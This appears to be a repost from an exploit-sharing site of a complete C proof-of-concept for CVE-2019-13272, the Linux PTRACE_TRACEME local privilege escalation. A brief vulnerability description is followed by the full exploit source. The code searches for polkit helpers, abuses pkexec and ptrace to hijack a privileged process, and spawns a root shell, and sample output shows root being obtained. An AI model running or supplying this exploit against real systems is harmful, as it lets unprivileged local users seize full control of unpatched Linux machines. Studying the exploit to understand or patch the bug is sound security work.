Linux kernel 5.1.17 CVE-2019-13272 – Unauthorized Access

admin

原文链接：https://0day.life/exploit/0day-636.html

Description

In the Linux kernel before 5.1.17, ptrace_link in kernel/ptrace.c mishandles the recording of the credentials of a process that wants to create a ptrace relationship, which allows local users to obtain root access by leveraging certain scenarios with a parent-child process relationship, where a parent drops privileges and calls execve (potentially allowing control by an attacker). One contributing factor is an object lifetime issue (which can also cause a panic). Another contributing factor is incorrect marking of a ptrace relationship as privileged, which is exploitable through (for example) Polkit’s pkexec helper with PTRACE_TRACEME. NOTE: SELinux deny_ptrace might be a usable workaround in some environments.

POC

1. // Linux 4.10 < 5.1.17 PTRACE_TRACEME local root (CVE-2019-13272)
   
2. // Uses pkexec technique
   
3. // ---
   
4. // Original discovery and exploit author: Jann Horn
   
5. // - https://bugs.chromium.org/p/project-zero/issues/detail?id=1903
   
6. // ---
   
7. // <bcoles@gmail.com>
   
8. // - added known helper paths
   
9. // - added search for suitable helpers
   
10. // - added automatic targeting
    
11. // - changed target suid exectuable from passwd to pkexec
    
12. // https://github.com/bcoles/kernel-exploits/tree/master/CVE-2019-13272
    
13. // ---
    
14. // Tested on:
    
15. // - Ubuntu 16.04.5 kernel 4.15.0-29-generic
    
16. // - Ubuntu 18.04.1 kernel 4.15.0-20-generic
    
17. // - Ubuntu 19.04 kernel 5.0.0-15-generic
    
18. // - Ubuntu Mate 18.04.2 kernel 4.18.0-15-generic
    
19. // - Linux Mint 19 kernel 4.15.0-20-generic
    
20. // - Debian 9.4.0 kernel 4.9.0-6-amd64
    
21. // - Debian 10.0.0 kernel 4.19.0-5-amd64
    
22. // - Devuan 2.0.0 kernel 4.9.0-6-amd64
    
23. // - SparkyLinux 5.8 kernel 4.19.0-5-amd64
    
24. // - Fedora Workstation 30 kernel 5.0.9-301.fc30.x86_64
    
25. // - Manjaro 18.0.3 kernel 4.19.23-1-MANJARO
    
26. // - Mageia 6 kernel 4.9.35-desktop-1.mga6
    
27. // - Antergos 18.7 kernel 4.17.6-1-ARCH
    
28. // ---
    
29. // user@linux-mint-19-2:~$ gcc -s poc.c -o ptrace_traceme_root
    
30. // user@linux-mint-19-2:~$ ./ptrace_traceme_root
    
31. // Linux 4.10 < 5.1.17 PTRACE_TRACEME local root (CVE-2019-13272)
    
32. // [.] Checking environment ...
    
33. // [~] Done, looks good
    
34. // [.] Searching for known helpers ...
    
35. // [~] Found known helper: /usr/sbin/mate-power-backlight-helper
    
36. // [.] Using helper: /usr/sbin/mate-power-backlight-helper
    
37. // [.] Spawning suid process (/usr/bin/pkexec) ...
    
38. // [.] Tracing midpid ...
    
39. // [~] Attached to midpid
    
40. // To run a command as administrator (user "root"), use "sudo <command>".
    
41. // See "man sudo_root" for details.
    
42. //
    
43. // root@linux-mint-19-2:/home/user#
    
44. // ---
    
45. 
    
46. #define _GNU_SOURCE
    
47. #include <string.h>
    
48. #include <stdlib.h>
    
49. #include <unistd.h>
    
50. #include <signal.h>
    
51. #include <stdio.h>
    
52. #include <fcntl.h>
    
53. #include <sched.h>
    
54. #include <stddef.h>
    
55. #include <stdarg.h>
    
56. #include <pwd.h>
    
57. #include <sys/prctl.h>
    
58. #include <sys/wait.h>
    
59. #include <sys/ptrace.h>
    
60. #include <sys/user.h>
    
61. #include <sys/syscall.h>
    
62. #include <sys/stat.h>
    
63. #include <linux/elf.h>
    
64. 
    
65. #define DEBUG
    
66. 
    
67. #ifdef DEBUG
    
68. #  define dprintf printf
    
69. #else
    
70. #  define dprintf
    
71. #endif
    
72. 
    
73. #define SAFE(expr) ({                   \
    
74.   typeof(expr) __res = (expr);          \
    
75.   if (__res == -1) {                    \
    
76.     dprintf("[-] Error: %s\n", #expr);  \
    
77.     return 0;                           \
    
78.   }                                     \
    
79.   __res;                                \
    
80. })
    
81. #define max(a,b) ((a)>(b) ? (a) : (b))
    
82. 
    
83. static const char *SHELL = "/bin/bash";
    
84. 
    
85. static int middle_success = 1;
    
86. static int block_pipe[2];
    
87. static int self_fd = -1;
    
88. static int dummy_status;
    
89. static const char *helper_path;
    
90. static const char *pkexec_path = "/usr/bin/pkexec";
    
91. static const char *pkaction_path = "/usr/bin/pkaction";
    
92. struct stat st;
    
93. 
    
94. const char *helpers[1024];
    
95. 
    
96. const char *known_helpers[] = {
    
97.   "/usr/lib/gnome-settings-daemon/gsd-backlight-helper",
    
98.   "/usr/lib/gnome-settings-daemon/gsd-wacom-led-helper",
    
99.   "/usr/lib/unity-settings-daemon/usd-backlight-helper",
    
100.   "/usr/lib/x86_64-linux-gnu/xfce4/session/xfsm-shutdown-helper",
     
101.   "/usr/sbin/mate-power-backlight-helper",
     
102.   "/usr/bin/xfpm-power-backlight-helper",
     
103.   "/usr/bin/lxqt-backlight_backend",
     
104.   "/usr/libexec/gsd-wacom-led-helper",
     
105.   "/usr/libexec/gsd-wacom-oled-helper",
     
106.   "/usr/libexec/gsd-backlight-helper",
     
107.   "/usr/lib/gsd-backlight-helper",
     
108.   "/usr/lib/gsd-wacom-led-helper",
     
109.   "/usr/lib/gsd-wacom-oled-helper",
     
110. };
     
111. 
     
112. /* temporary printf; returned pointer is valid until next tprintf */
     
113. static char *tprintf(char *fmt, ...) {
     
114.   static char buf[10000];
     
115.   va_list ap;
     
116.   va_start(ap, fmt);
     
117.   vsprintf(buf, fmt, ap);
     
118.   va_end(ap);
     
119.   return buf;
     
120. }
     
121. 
     
122. /*
     
123. * fork, execute pkexec in parent, force parent to trace our child process,
     
124. * execute suid executable (pkexec) in child.
     
125. */
     
126. static int middle_main(void *dummy) {
     
127.   prctl(PR_SET_PDEATHSIG, SIGKILL);
     
128.   pid_t middle = getpid();
     
129. 
     
130.   self_fd = SAFE(open("/proc/self/exe", O_RDONLY));
     
131. 
     
132.   pid_t child = SAFE(fork());
     
133.   if (child == 0) {
     
134.     prctl(PR_SET_PDEATHSIG, SIGKILL);
     
135. 
     
136.     SAFE(dup2(self_fd, 42));
     
137. 
     
138.     /* spin until our parent becomes privileged (have to be fast here) */
     
139.     int proc_fd = SAFE(open(tprintf("/proc/%d/status", middle), O_RDONLY));
     
140.     char *needle = tprintf("\nUid:\t%d\t0\t", getuid());
     
141.     while (1) {
     
142.       char buf[1000];
     
143.       ssize_t buflen = SAFE(pread(proc_fd, buf, sizeof(buf)-1, 0));
     
144.       buf[buflen] = '\0';
     
145.       if (strstr(buf, needle)) break;
     
146.     }
     
147. 
     
148.     /*
     
149.      * this is where the bug is triggered.
     
150.      * while our parent is in the middle of pkexec, we force it to become our
     
151.      * tracer, with pkexec's creds as ptracer_cred.
     
152.      */
     
153.     SAFE(ptrace(PTRACE_TRACEME, 0, NULL, NULL));
     
154. 
     
155.     /*
     
156.      * now we execute a suid executable (pkexec).
     
157.      * Because the ptrace relationship is considered to be privileged,
     
158.      * this is a proper suid execution despite the attached tracer,
     
159.      * not a degraded one.
     
160.      * at the end of execve(), this process receives a SIGTRAP from ptrace.
     
161.      */
     
162.     execl(pkexec_path, basename(pkexec_path), NULL);
     
163. 
     
164.     dprintf("[-] execl: Executing suid executable failed");
     
165.     exit(EXIT_FAILURE);
     
166.   }
     
167. 
     
168.   SAFE(dup2(self_fd, 0));
     
169.   SAFE(dup2(block_pipe[1], 1));
     
170. 
     
171.   /* execute pkexec as current user */
     
172.   struct passwd *pw = getpwuid(getuid());
     
173.   if (pw == NULL) {
     
174.     dprintf("[-] getpwuid: Failed to retrieve username");
     
175.     exit(EXIT_FAILURE);
     
176.   }
     
177. 
     
178.   middle_success = 1;
     
179.   execl(pkexec_path, basename(pkexec_path), "--user", pw->pw_name,
     
180.         helper_path,
     
181.         "--help", NULL);
     
182.   middle_success = 0;
     
183.   dprintf("[-] execl: Executing pkexec failed");
     
184.   exit(EXIT_FAILURE);
     
185. }
     
186. 
     
187. /* ptrace pid and wait for signal */
     
188. static int force_exec_and_wait(pid_t pid, int exec_fd, char *arg0) {
     
189.   struct user_regs_struct regs;
     
190.   struct iovec iov = { .iov_base = &regs, .iov_len = sizeof(regs) };
     
191.   SAFE(ptrace(PTRACE_SYSCALL, pid, 0, NULL));
     
192.   SAFE(waitpid(pid, &dummy_status, 0));
     
193.   SAFE(ptrace(PTRACE_GETREGSET, pid, NT_PRSTATUS, &iov));
     
194. 
     
195.   /* set up indirect arguments */
     
196.   unsigned long scratch_area = (regs.rsp - 0x1000) & ~0xfffUL;
     
197.   struct injected_page {
     
198.     unsigned long argv[2];
     
199.     unsigned long envv[1];
     
200.     char arg0[8];
     
201.     char path[1];
     
202.   } ipage = {
     
203.     .argv = { scratch_area + offsetof(struct injected_page, arg0) }
     
204.   };
     
205.   strcpy(ipage.arg0, arg0);
     
206.   for (int i = 0; i < sizeof(ipage)/sizeof(long); i++) {
     
207.     unsigned long pdata = ((unsigned long *)&ipage)[i];
     
208.     SAFE(ptrace(PTRACE_POKETEXT, pid, scratch_area + i * sizeof(long),
     
209.                 (void*)pdata));
     
210.   }
     
211. 
     
212.   /* execveat(exec_fd, path, argv, envv, flags) */
     
213.   regs.orig_rax = __NR_execveat;
     
214.   regs.rdi = exec_fd;
     
215.   regs.rsi = scratch_area + offsetof(struct injected_page, path);
     
216.   regs.rdx = scratch_area + offsetof(struct injected_page, argv);
     
217.   regs.r10 = scratch_area + offsetof(struct injected_page, envv);
     
218.   regs.r8 = AT_EMPTY_PATH;
     
219. 
     
220.   SAFE(ptrace(PTRACE_SETREGSET, pid, NT_PRSTATUS, &iov));
     
221.   SAFE(ptrace(PTRACE_DETACH, pid, 0, NULL));
     
222.   SAFE(waitpid(pid, &dummy_status, 0));
     
223. }
     
224. 
     
225. static int middle_stage2(void) {
     
226.   /* our child is hanging in signal delivery from execve()'s SIGTRAP */
     
227.   pid_t child = SAFE(waitpid(-1, &dummy_status, 0));
     
228.   force_exec_and_wait(child, 42, "stage3");
     
229.   return 0;
     
230. }
     
231. 
     
232. // * * * * * * * * * * * * * * * * root shell * * * * * * * * * * * * * * * * *
     
233. 
     
234. static int spawn_shell(void) {
     
235.   SAFE(setresgid(0, 0, 0));
     
236.   SAFE(setresuid(0, 0, 0));
     
237.   execlp(SHELL, basename(SHELL), NULL);
     
238.   dprintf("[-] execlp: Executing shell %s failed", SHELL);
     
239.   exit(EXIT_FAILURE);
     
240. }
     
241. 
     
242. // * * * * * * * * * * * * * * * * * Detect * * * * * * * * * * * * * * * * * *
     
243. 
     
244. static int check_env(void) {
     
245.   const char* xdg_session = getenv("XDG_SESSION_ID");
     
246. 
     
247.   dprintf("[.] Checking environment ...\n");
     
248. 
     
249.   if (stat(pkexec_path, &st) != 0) {
     
250.     dprintf("[-] Could not find pkexec executable at %s", pkexec_path);
     
251.     exit(EXIT_FAILURE);
     
252.   }
     
253.   if (stat(pkaction_path, &st) != 0) {
     
254.     dprintf("[-] Could not find pkaction executable at %s", pkaction_path);
     
255.     exit(EXIT_FAILURE);
     
256.   }
     
257.   if (xdg_session == NULL) {
     
258.     dprintf("[!] Warning: $XDG_SESSION_ID is not set\n");
     
259.     return 1;
     
260.   }
     
261.   if (system("/bin/loginctl --no-ask-password show-session $XDG_SESSION_ID | grep Remote=no >>/dev/null 2>>/dev/null") != 0) {
     
262.     dprintf("[!] Warning: Could not find active PolKit agent\n");
     
263.     return 1;
     
264.   }
     
265. 
     
266.   dprintf("[~] Done, looks good\n");
     
267. 
     
268.   return 0;
     
269. }
     
270. 
     
271. /*
     
272. * Use pkaction to search PolKit policy actions for viable helper executables.
     
273. * Check each action for allow_active=yes, extract the associated helper path,
     
274. * and check the helper path exists.
     
275. */
     
276. int find_helpers() {
     
277.   char cmd[1024];
     
278.   snprintf(cmd, sizeof(cmd), "%s --verbose", pkaction_path);
     
279.   FILE *fp;
     
280.   fp = popen(cmd, "r");
     
281.   if (fp == NULL) {
     
282.     dprintf("[-] Failed to run: %s\n", cmd);
     
283.     exit(EXIT_FAILURE);
     
284.   }
     
285. 
     
286.   char line[1024];
     
287.   char buffer[2048];
     
288.   int helper_index = 0;
     
289.   int useful_action = 0;
     
290.   static const char *needle = "org.freedesktop.policykit.exec.path -> ";
     
291.   int needle_length = strlen(needle);
     
292. 
     
293.   while (fgets(line, sizeof(line)-1, fp) != NULL) {
     
294.     /* check the action uses allow_active=yes*/
     
295.     if (strstr(line, "implicit active:")) {
     
296.       if (strstr(line, "yes")) {
     
297.         useful_action = 1;
     
298.       }
     
299.       continue;
     
300.     }
     
301. 
     
302.     if (useful_action == 0)
     
303.       continue;
     
304.     useful_action = 0;
     
305. 
     
306.     /* extract the helper path */
     
307.     int length = strlen(line);
     
308.     char* found = memmem(&line[0], length, needle, needle_length);
     
309.     if (found == NULL)
     
310.       continue;
     
311. 
     
312.     memset(buffer, 0, sizeof(buffer));
     
313.     for (int i = 0; found[needle_length + i] != '\n'; i++) {
     
314.       if (i >= sizeof(buffer)-1)
     
315.         continue;
     
316.       buffer[i] = found[needle_length + i];
     
317.     }
     
318. 
     
319.     if (strstr(&buffer[0], "/xf86-video-intel-backlight-helper") != 0 ||
     
320.       strstr(&buffer[0], "/cpugovctl") != 0 ||
     
321.       strstr(&buffer[0], "/package-system-locked") != 0 ||
     
322.       strstr(&buffer[0], "/cddistupgrader") != 0) {
     
323.       dprintf("[.] Ignoring blacklisted helper: %s\n", &buffer[0]);
     
324.       continue;
     
325.     }
     
326. 
     
327.     /* check the path exists */
     
328.     if (stat(&buffer[0], &st) != 0)
     
329.       continue;
     
330. 
     
331.     helpers[helper_index] = strndup(&buffer[0], strlen(buffer));
     
332.     helper_index++;
     
333. 
     
334.     if (helper_index >= sizeof(helpers)/sizeof(helpers[0]))
     
335.       break;
     
336.   }
     
337. 
     
338.   pclose(fp);
     
339.   return 0;
     
340. }
     
341. 
     
342. // * * * * * * * * * * * * * * * * * Main * * * * * * * * * * * * * * * * *
     
343. 
     
344. int ptrace_traceme_root() {
     
345.   dprintf("[.] Using helper: %s\n", helper_path);
     
346. 
     
347.   /*
     
348.    * set up a pipe such that the next write to it will block: packet mode,
     
349.    * limited to one packet
     
350.    */
     
351.   SAFE(pipe2(block_pipe, O_CLOEXEC|O_DIRECT));
     
352.   SAFE(fcntl(block_pipe[0], F_SETPIPE_SZ, 0x1000));
     
353.   char dummy = 0;
     
354.   SAFE(write(block_pipe[1], &dummy, 1));
     
355. 
     
356.   /* spawn pkexec in a child, and continue here once our child is in execve() */
     
357.   dprintf("[.] Spawning suid process (%s) ...\n", pkexec_path);
     
358.   static char middle_stack[1024*1024];
     
359.   pid_t midpid = SAFE(clone(middle_main, middle_stack+sizeof(middle_stack),
     
360.                             CLONE_VM|CLONE_VFORK|SIGCHLD, NULL));
     
361.   if (!middle_success) return 1;
     
362. 
     
363.   /*
     
364.    * wait for our child to go through both execve() calls (first pkexec, then
     
365.    * the executable permitted by polkit policy).
     
366.    */
     
367.   while (1) {
     
368.     int fd = open(tprintf("/proc/%d/comm", midpid), O_RDONLY);
     
369.     char buf[16];
     
370.     int buflen = SAFE(read(fd, buf, sizeof(buf)-1));
     
371.     buf[buflen] = '\0';
     
372.     *strchrnul(buf, '\n') = '\0';
     
373.     if (strncmp(buf, basename(helper_path), 15) == 0)
     
374.       break;
     
375.     usleep(100000);
     
376.   }
     
377. 
     
378.   /*
     
379.    * our child should have gone through both the privileged execve() and the
     
380.    * following execve() here
     
381.    */
     
382.   dprintf("[.] Tracing midpid ...\n");
     
383.   SAFE(ptrace(PTRACE_ATTACH, midpid, 0, NULL));
     
384.   SAFE(waitpid(midpid, &dummy_status, 0));
     
385.   dprintf("[~] Attached to midpid\n");
     
386. 
     
387.   force_exec_and_wait(midpid, 0, "stage2");
     
388.   exit(EXIT_SUCCESS);
     
389. }
     
390. 
     
391. int main(int argc, char **argv) {
     
392.   if (strcmp(argv[0], "stage2") == 0)
     
393.     return middle_stage2();
     
394.   if (strcmp(argv[0], "stage3") == 0)
     
395.     return spawn_shell();
     
396. 
     
397.   dprintf("Linux 4.10 < 5.1.17 PTRACE_TRACEME local root (CVE-2019-13272)\n");
     
398. 
     
399.   check_env();
     
400. 
     
401.   if (argc > 1 && strcmp(argv[1], "check") == 0) {
     
402.     exit(0);
     
403.   }
     
404. 
     
405.   /* Search for known helpers defined in 'known_helpers' array */
     
406.   dprintf("[.] Searching for known helpers ...\n");
     
407.   for (int i=0; i<sizeof(known_helpers)/sizeof(known_helpers[0]); i++) {
     
408.     if (stat(known_helpers[i], &st) == 0) {
     
409.       helper_path = known_helpers[i];
     
410.       dprintf("[~] Found known helper: %s\n", helper_path);
     
411.       ptrace_traceme_root();
     
412.     }
     
413.   }
     
414. 
     
415.   /* Search polkit policies for helper executables */
     
416.   dprintf("[.] Searching for useful helpers ...\n");
     
417.   find_helpers();
     
418.   for (int i=0; i<sizeof(helpers)/sizeof(helpers[0]); i++) {
     
419.     if (helpers[i] == NULL)
     
420.       break;
     
421. 
     
422.     if (stat(helpers[i], &st) == 0) {
     
423.       helper_path = helpers[i];
     
424.       ptrace_traceme_root();
     
425.     }
     
426.   }
     
427. 
     
428.   return 0;
     
429. }

复制代码